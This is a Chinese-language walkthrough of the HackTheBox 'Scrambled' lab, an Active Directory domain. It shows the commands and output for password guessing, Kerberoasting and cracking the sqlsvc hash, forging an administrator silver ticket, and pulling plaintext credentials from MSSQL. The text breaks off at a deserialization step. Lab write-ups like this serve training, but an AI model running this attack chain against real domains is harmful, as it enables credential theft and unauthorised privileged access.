Tracks-AD-Scrambled

解决了困扰了我很久的ldaps需要证书，和smb的krb认证连接问题

Nmap

10.10.11.168

└─$ sudo nmap -sS 10.10.11.168  -p- --min-rate=2000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 03:31 EST
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 37.25% done; ETC: 03:33 (0:01:01 remaining)
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 03:33 (0:00:00 remaining)
Nmap scan report for 10.10.11.168
Host is up (0.13s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
4411/tcp  open  found
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49700/tcp open  unknown
49705/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 98.57 seconds


└─$ sudo nmap -sU 10.10.11.168 --top-ports=200 --min-rate=2000
[sudo] password for fonllge:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 03:32 EST
Nmap scan report for 10.10.11.168
Host is up (0.13s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 1.03 seconds

ldap

└─$ ldapsearch -x -H ldap://10.10.11.168 -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=scrm,DC=local
ldapServiceName: scrm.local:dc1$@SCRM.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=scrm,DC=local
serverName: CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configura
 tion,DC=scrm,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=scrm,DC=local
namingContexts: DC=scrm,DC=local
namingContexts: CN=Configuration,DC=scrm,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=scrm,DC=local
namingContexts: DC=DomainDnsZones,DC=scrm,DC=local
namingContexts: DC=ForestDnsZones,DC=scrm,DC=local
isSynchronized: TRUE
highestCommittedUSN: 290953
dsServiceName: CN=NTDS Settings,CN=DC1,CN=Servers,CN=Default-First-Site-Name,C
 N=Sites,CN=Configuration,DC=scrm,DC=local
dnsHostName: DC1.scrm.local
defaultNamingContext: DC=scrm,DC=local
currentTime: 20250102081951.0Z
configurationNamingContext: CN=Configuration,DC=scrm,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

----
dc:DC1.scrm.local

to User

没有smb未授权等，突破口还是要再看看web

首先就是他关掉了ntlm，所以后续操作我们都要先gettgt用tgt做。

而后是他们的管理对用户的密码重置习惯，重置过密码的用户，用户名就是密码.

而后他们还有个应用，开启debug会在本地写入所有日志.

最后还有IT支持团队的支持示例

其中最后一张IT团队的图中，可以看到用户名是ksimpson，又因为他们会有重置后密码用户名相同的状况，拿这个用户名测试一下是否用户名密码相同。

└─$ kerbrute bruteforce -d scrm.local user  --dc 10.10.11.168 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/02/25 - Ronnie Flathers @ropnop

2025/01/02 03:58:50 >  Using KDC(s):
2025/01/02 03:58:50 >   10.10.11.168:88

2025/01/02 03:58:50 >  [+] VALID LOGIN:  ksimpson@scrm.local:ksimpson
2025/01/02 03:58:50 >  Done! Tested 1 logins (1 successes) in 0.582 seconds

也确实是这个样子,这个用户估计被重置过吗，但是没有改默认的密码ksimpson:ksimpson

这里因为他把ntlm认证关了，所以用impacket-getTGT拿到tgt来做交互

impacket-getTGT 'scrm.local/ksimpson:ksimpson' -dc-ip 10.10.11.168

然后export KRB5CCNAME=<ccache path>导入票据（这个因为过于基础了所以我之前的wp好像有一部分没写）

遛狗

└─$ bloodhound.py -c All -d scrm.local -u ksimpson -p ksimpson -k -no-pass -ns 10.10.11.168 -dc dc1.scrm.local --zip --use-ldaps
INFO: Found AD domain: scrm.local
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc1.scrm.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc1.scrm.local
INFO: Found 16 users
INFO: Found 62 groups
INFO: Found 6 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: WS01.scrm.local
INFO: Querying computer: DC1.scrm.local
INFO: Done in 00M 29S
INFO: Compressing output into 20250102042042_bloodhound.zip

顺带看一下smb，这里我想用smbclient，但是使用了-kkrb来连接时会一直报错，所以我使用了impacket-smbclient，这次成功连接了，看来原生的smbclient我还是没玩明白。

└─$ impacket-smbclient 'scrm.local/ksimpson:ksimpson@dc1.scrm.local' -k -dc-ip scrm.local          
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# help

 open {host,port=445} - opens a SMB connection against the target host/port
 login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
 kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
 login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
 logoff - logs off
 shares - list available shares
 use {sharename} - connect to an specific share
 cd {path} - changes the current directory to {path}
 lcd {path} - changes the current local directory to {path}
 pwd - shows current remote directory
 password - changes the user password, the new password will be prompted for input
 ls {wildcard} - lists all the files in the current directory
 lls {dirname} - lists all the files on the local filesystem.
 tree {filepath} - recursively lists all files in folder and sub folders
 rm {file} - removes the selected file
 mkdir {dirname} - creates the directory under the current path
 rmdir {dirname} - removes the directory under the current path
 put {filename} - uploads the filename into the current path
 get {filename} - downloads the filename from the current path
 mget {mask} - downloads all files from the current directory matching the provided mask
 cat {filename} - reads the filename from the current path
 mount {target,path} - creates a mount point from {path} to {target} (admin required)
 umount {path} - removes the mount point at {path} without deleting the directory (admin required)
 list_snapshots {path} - lists the vss snapshots for the specified path
 info - returns NetrServerInfo main results
 who - returns the sessions currently connected at the target host (admin required)
 close - closes the current SMB Session
 exit - terminates the server process (and this session)

查看所有sharename

# shares 
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL

挨个尝试，打的时候忘记跑smbmap了，这里挨个试显得我有些笨，在Public里有东西。

# use Public
# tree
/Network Security Changes.pdf
Finished - 0 files and folders
# ls
drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 .
drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 ..
-rw-rw-rw-     630106  Fri Nov  5 13:45:07 2021 Network Security Changes.pdf

down下来，pdf中说，现在取消了所有的ntlm，改为了krb认证，其次是攻击者因为会从数据库中窃取凭证，所以取消了hr组对数据库的访问权限，改为只有administrators组才可以访问数据库。

简而言之就是数据库里有凭证怕泄露，所以只有administrators组里用户才能访问数据库.

暂时没有什么头绪，我们正常搜点，用当前的用户跑一遍getNPU和getUserSPNs

getNPU没有什么产出，但是getUserSPNs确有了收获，得到了sqlsvc的tgs

└─$ impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-ip 10.10.11.168 -dc-host dc1.scrm.local  -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2025-01-02 04:18:41.272081             
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2025-01-02 04:18:41.272081             



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$512edc4e4....

尝试跑一下，就得到了账号密码sqlsvc:Pegasus60

└─$ hashcat svc_sql_hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$512edc4e41...:Pegasus60

居然我们拿到了MSSQL的服务账户的密码，那就可以来制作银票，通过伪造administrator的tgs来访问mssql

可以参考下文

https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/silver

重点需要：域sid、伪造目标用户的sid、服务账号的nthash

首先搞一下administrator的sid，这里方法很多，用looksid、powerview、ldap、getpac、狗图等等都可以，但是，这里我在0xdf的wp中找到了困扰我已久的ldaps连接凭证报错问题，所以会简单记录一下ldaps配置的过程。

ldaps

https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html#ldap---tcp-389

说白了还是需要配置一个客户端证书

所以首先要获取客户端证书

└─$ openssl s_client -host dc1.scrm.local  -connect dc1.scrm.local:636
Connecting to 10.10.11.168
CONNECTED(00000003)
depth=0
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0
verify return:1
---
Certificate chain
 0 s:
   i:DC=local, DC=scrm, CN=scrm-DC1-CA
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA1
   v:NotBefore: Sep  4 11:14:45 2024 GMT; NotAfter: Jun  8 22:39:53 2121 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
-----END CERTIFICATE-----

将其中CERTIFICATE的部分保存，编辑/etc/ldap/ldaps.conf作为后续的pem使用

修改ldap.conf，新增一行指向刚刚获取到的证书的保存路径

└─$ sudo cat /etc/ldap/ldap.conf
#
# LDAP Defaults
#

# See ldap.conf(5) for details
# This file should be world readable but not world writable.

#BASE   dc=example,dc=com
#URI    ldap://ldap.example.com ldap://ldap-provider.example.com:666

#SIZELIMIT      12
#TIMELIMIT      15
#DEREF          never

# TLS certificates (needed for GnuTLS)
#TLS_CACERT     /etc/ssl/certs/ca-certificates.crt
TLS_CACERT /home/Desktop/htb/Scrambled/sqlsvc.pem

现在就可以通过ldapsearch来连接ldaps

└─$ ldapsearch -x -Z -H ldaps://dc1.scrm.local:636 -s base -D 'sqlsvc@scrm.local' -w 'Pegasus60'
ldap_start_tls: Operations error (1)
        additional info: 00000000: LdapErr: DSID-0C091325, comment: TLS or SSL already in effect, data 0, v4563
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=scrm,DC=local
ldapServiceName: scrm.local:dc1$@SCRM.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
...

---

不过这里我还是用的powerview.py看的sid（

└─$ powerview scrm.local/sqlsvc:Pegasus60@dc1.scrm.local --dc-ip 10.10.11.168 -k

(LDAPS)-[DC1.scrm.local]-[SCRM\sqlsvc]
PV > Get-DomainObject -Identity  administrator
objectClass                : top
                             person
                             organizationalPerson
                             user
cn                         : Administrator
...
objectSid                  : S-1-5-21-2743207045-1827831105-2542523200-500
adminCount                 : 1
accountExpires             : 9223372036854775807
logonCount                 : 257
sAMAccountName             : administrator
sAMAccountType             : SAM_USER_OBJECT
userPrincipalName          : administrator@scrm.local
...

用户sid就是500，域sid这域里也没有子域啥的所以就是用户sid的前面S-1-5-21-2743207045-1827831105-2542523200这个

而后是服务账号sqlsvc的nthtml，既然有了明文密码直接拿来生成一个就好

当然也可以用openssl来生成

https://blog.atucom.net/2012/10/generate-ntlm-hashes-via-command-line.html

└─$ cat gen_pass2nthash
#!/usr/bin/bash
iconv -f ASCII -t UTF-16LE <(printf "$1") | openssl dgst -md4


└─$ gen_pass2nthash Pegasus60
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05

集齐了三个必要项之后就可以制作银票，spn选择sqlsvc的，因为他是mssql的服务账号啦。

目前就可以拿着身份为administrator的银票去访问mssql了

└─$ impacket-ticketer -spn 'MSSQLSvc/dc1.scrm.local'  -dc-ip 10.10.16.168  -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 -domain-sid  S-1-5-21-2743207045-1827831105-2542523200  administrator

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

其实也可以不用目标sid，像下面这个样子，看个人喜好，我习惯写全点

└─$ impacket-ticketer -spn 'MSSQLSvc/dc1.scrm.local'  -dc-ip 10.10.16.168  -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05  -domain-sid  S-1-5-21-2743207045-1827831105-2542523200  administrator

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

---

看下票据信息

└─$ python3 ~/tools/impacket/examples/describeTicket.py ./administrator.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 6f59694f45596975426e44596a697547
[*] User Name                     : administrator
[*] User Realm                    : SCRM.LOCAL
[*] Service Name                  : MSSQLSvc/dc1.scrm.local
[*] Service Realm                 : SCRM.LOCAL
[*] Start Time                    : 02/01/2025 06:19:33 AM
[*] End Time                      : 31/12/2034 06:19:33 AM
[*] RenewTill                     : 31/12/2034 06:19:33 AM
[*] Flags                         : (0x50a00000) forwardable, proxiable, renewable, pre_authent
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : b1lpT0VZaXVCbkRZaml1Rw==
[*] Kerberoast hash               : $krb5tgs$23$*USER$SCRM.LOCAL$MSSQLSvc/dc1.scrm.local*$9a97d5e5495646611aadfaa5913da2fa$4e7996d57fefd716eeceb39054f50a0a12cb05e8c51c84cd41dbed6eb40f597a0bb672b1008a6c7c7c61ab6272615df45635b29844e2549df9e42890324147aeb7402b3e5a436f9acbe7a51ff017c7b9162eb79a69d35793c6e10748d22991103aabfd1330881a1887298923023095787e7bd7ffa5e4c943c2957b0383403d2082ee879b44750ee0d7497a5b92833a3213214f4a147e23f1582c336e01bec852055bf1d2839e99097534fef0aea343aa72706f5fa79be646743a655fb8d65d1ca7d34e4a1d2734b2f60d66f1f173747c79888db2b7e4122b0d61923736f37b5c57ede0ca18f7f7b599b40b28693e1600f0f7c7744b9e40590c039741a92039aec452e5cd6588f6188a5f4e9c3ae9148ec3bf98ce6b7be5691a4e6cafacd9e609a3d5d3724f694c96b16cadfa60377a9cdd9a9dd5c1b2fc3a1a9dc2af3db0da10adb4822ca70b2821721eb112e71e6922b090954e54ed08df19db91e310857dbfb522d4642cb5a0dbe0d15a70078946ecc6bea8878d913f28f68d227ecc74ddc42b910e24740c6bc358ffcabf8a933d9b28fe47c3ecc1f0d5a4b1fc474c0b81c12fc1e466b6c8f50d47663bd8a6faf1dda873716247cde63e728a313e67f4d36896aeb8a549053629ae90b10f8aee802839780c24f37e40d84f3e66222225253d4ce7bc0ecf800dda4d8493d0f666b35dcdb663a9aaded80cfb005c14b4ab2d67dc20e34b74ad9255fc3515c4f39a3d59978ef1a14fc8b3eae049cc211496a20b931a7d279327341d78904c0345df41dcb3d8812b28f39ab1a76150b89dc1de802b28c2bd81ae3761852015a2db0a60ada877103c28cbfe4521ef2eeabfaca8f95f61274664f9a659ad1af86e422d26535145fb445845a521b068dc5c914c7484249f6b49554c6d8d3ea2df1a10dfc2f4d09f8d6c8ec8b6f9fa56fd129025546fd2f61bb47f6148c64917f1bdf95408b247a6facaa49e77975b7129abfcc16fcedeef521a5c7bc3e5755455a08181c04348be26cfcc775eae4457f8bf036264eac0d91fca268358b52197eb8f013b04f467e9cf05eae60805b36a13c258f7b2ba48a81152117335f2c18218903bd42a1108aa52fb6e079e71fc98a96110389ebea1ae9581bbf4e276b2ae0608969323ad5fc504cdd6685135f5afd8ba587e12d5875fb87347170bf52eddce3744b1539184b06712e30987a9b9a707281da1454512f247de06913000b4b67382025dede06e42df589479839111c7b4cf7f0b2ede5c74ced20bc33f9568ef0f70b8c36410085591c19a66611d
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : MSSQLSvc/dc1.scrm.local <-spn
[*]   Service Realm               : SCRM.LOCAL
[*]   Encryption type             : rc4_hmac (etype 23)
[-] Could not find the correct encryption key! Ticket is encrypted with rc4_hmac (etype 23), but no keys/creds were supplied

spn是我们指定的mssqlsvc没错，可以快乐访问了

导入票据后，连接数据库

└─$ impacket-mssqlclient -dc-ip 10.10.11.168  dc1.scrm.local -k  -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: ./administrator.ccache
[+] Domain retrieved from CCache: SCRM.LOCAL
[+] SPN MSSQLSVC/DC1.SCRM.LOCAL:1433@SCRM.LOCAL not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for MSSQLSVC/DC1.SCRM.LOCAL@SCRM.LOCAL
[+] Using TGS from cache
[+] Changing sname from MSSQLSvc/dc1.scrm.local@SCRM.LOCAL to MSSQLSVC/DC1.SCRM.LOCAL:1433@SCRM.LOCAL and hoping for the best
[+] Username retrieved from CCache: administrator
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands

看下都有哪些库，能看到有个hr的库，他pdf中也说了，是因为凭证泄露风险而ban的hr组的数据库访问权限，所以其中大概率是有凭证。

SQL (SCRM\administrator  dbo@master)> enum_db
name         is_trustworthy_on   
----------   -----------------   
master                       0   

tempdb                       0   

model                        0   

msdb                         1   

ScrambleHR                   0   

查看表信息

SQL (SCRM\administrator  dbo@master)> use ScrambleHr;
SQL (SCRM\administrator  dbo@ScrambleHR)> select name from sys.tables;
name         
----------   
Employees    

UserImport   

Timesheets   

翻了下三个表就这个UserImport里不是空的。

SQL (SCRM\administrator  dbo@ScrambleHR)> select * from UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups   
--------   -----------------   ----------   ---------------   -------------   
MiscSvc    ScrambledEggs9900   scrm.local                90               0 

得到账号密码。

MiscSvc

ScrambledEggs9900

这个用户在ITshares组和remote managment中，不过拿着他的票据去winrm连不上

我改了下krb的配置

└─$ cat /etc/krb5.conf
[libdefaults]
    default_realm = SCRM.LOCAL
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    SCRM.LOCAL = {
        kdc = dc1.scrm.local
    }

[domain_realm]
    .scrm.local = SCRM.LOCAL
    scrm.local = SCRM.LOCAL

发起连接，但是却不行

└─$ evil-winrm -r scrm.local -i dc1.scsrm.local -u miscsvc
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure.  Minor code may provide more information
Server not found in Kerberos database

                                        
Error: Exiting with code 1

再通过这个账号密码去查看他ITUser组smb的share

└─$ impacket-smbclient scrm.local/miscsvc:ScrambledEggs9900@dc1.scrm.local -k -dc-ip 10.10.11.168
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL

# use IT
# ls
drw-rw-rw-          0  Wed Nov  3 15:32:55 2021 .
drw-rw-rw-          0  Wed Nov  3 15:32:55 2021 ..
drw-rw-rw-          0  Wed Nov  3 17:06:32 2021 Apps
drw-rw-rw-          0  Wed Nov  3 15:32:44 2021 Logs
drw-rw-rw-          0  Wed Nov  3 15:32:55 2021 Reports
# cd Apps

# ls
drw-rw-rw-          0  Wed Nov  3 17:06:32 2021 .
drw-rw-rw-          0  Wed Nov  3 17:06:32 2021 ..
drw-rw-rw-          0  Fri Nov  5 16:57:08 2021 Sales Order Client
# 

在这个文件夹中包含了一个exe和一个dll

这部分需要切到win的环境做，在win中打开exe，即可发现和我们在web部分看到的是同一个程式。

那按照web上的信息来配置即可，同样勾选debug

server是dc1.scrm.local,port是4411

这里通过尝试了几个密码都无法登录，同时再进行反编译可以看到，在login部分输入scrmdev用户名时，可以直接return登录成功。

我们开启了debug，所以他会在本地输出所有日志保存到txt当中

这里我们作为客户端，登录之后收到的base64的内容显然是序列化过后的。

